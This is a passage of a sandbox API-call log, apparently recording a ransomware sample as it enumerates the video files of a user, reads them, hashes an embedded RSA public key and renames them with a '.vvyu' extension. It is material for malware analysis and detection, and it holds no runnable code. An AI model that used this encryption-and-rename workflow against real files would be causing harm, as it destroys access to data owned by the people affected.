lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0196.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0196.227] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.228] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0196.228] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.228] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.228] CloseHandle (hObject=0x584) returned 1 [0196.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0196.230] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0196.231] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0196.231] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\0IPRI83H.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\0ipri83h.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\0IPRI83H.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\0ipri83h.flv.vvyu")) returned 1 [0196.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.233] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x345758 | out: hHeap=0x2c0000) returned 1 [0196.235] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ad13050, ftCreationTime.dwHighDateTime=0x1d89f68, ftLastAccessTime.dwLowDateTime=0xff506170, ftLastAccessTime.dwHighDateTime=0x1d8a1da, ftLastWriteTime.dwLowDateTime=0xff506170, ftLastWriteTime.dwHighDateTime=0x1d8a1da, nFileSizeHigh=0x0, nFileSizeLow=0x11423, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3Ad0c.mkv", cAlternateFileName="")) returned 1 [0196.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x345758 [0196.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.236] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\3Ad0c.mkv") returned=".mkv" [0196.236] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\3Ad0c.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\3ad0c.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0196.236] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=70691) returned 1 [0196.236] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0196.240] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x113fd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.240] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0196.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.242] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.243] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x11423, lpOverlapped=0x0) returned 1 [0196.244] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0196.244] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.244] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.244] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0196.245] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0196.245] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.245] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0196.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0196.245] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0196.245] GetLastError () returned 0x0 [0196.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0196.245] GetLastError () returned 0x0 [0196.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0196.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0196.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.246] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0196.246] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0196.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.246] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0196.246] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0196.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.247] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0196.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0196.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11420) returned 0x2af5168 [0196.248] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0196.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0196.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0196.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea188 [0196.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6560 [0196.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea1d0 [0196.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6578 [0196.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65a8 [0196.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6608 [0196.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65c0 [0196.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0196.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0196.249] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0196.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0196.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65a8 | out: hHeap=0x2c0000) returned 1 [0196.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65c0 | out: hHeap=0x2c0000) returned 1 [0196.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6608 | out: hHeap=0x2c0000) returned 1 [0196.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0196.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6608 [0196.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0196.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65c0 [0196.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0196.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae65a8 [0196.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0196.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0196.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0196.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0196.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0196.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0196.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0196.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65c0 | out: hHeap=0x2c0000) returned 1 [0196.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65a8 | out: hHeap=0x2c0000) returned 1 [0196.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6608 | out: hHeap=0x2c0000) returned 1 [0196.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0196.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0196.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0196.252] GetCurrentThreadId () returned 0x5d8 [0196.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0196.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae8b68 [0196.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0196.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0196.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0196.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0196.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.252] GetCurrentThreadId () returned 0x5d8 [0196.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0196.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0196.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0196.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0196.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6608 [0196.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0196.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0196.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0196.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65a8 [0196.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0196.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0196.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0196.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0196.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65c0 [0196.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0196.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0196.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0196.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6590 [0196.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0196.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6620 [0196.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0196.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65f0 [0196.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae65d8 [0196.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6638 [0196.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65d8 | out: hHeap=0x2c0000) returned 1 [0196.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65d8 [0196.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65f0 | out: hHeap=0x2c0000) returned 1 [0196.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0196.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0196.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0196.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65a8 | out: hHeap=0x2c0000) returned 1 [0196.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae65a8 [0196.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0196.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6608 | out: hHeap=0x2c0000) returned 1 [0196.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0196.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6638 | out: hHeap=0x2c0000) returned 1 [0196.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0196.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0196.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0196.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0196.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65a8 | out: hHeap=0x2c0000) returned 1 [0196.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0196.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0196.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0196.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0196.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0196.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0196.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0196.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0196.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0196.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0196.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65d8 | out: hHeap=0x2c0000) returned 1 [0196.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6620 | out: hHeap=0x2c0000) returned 1 [0196.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae65c0 | out: hHeap=0x2c0000) returned 1 [0196.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6590 | out: hHeap=0x2c0000) returned 1 [0196.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0196.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0196.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6578 | out: hHeap=0x2c0000) returned 1 [0196.262] 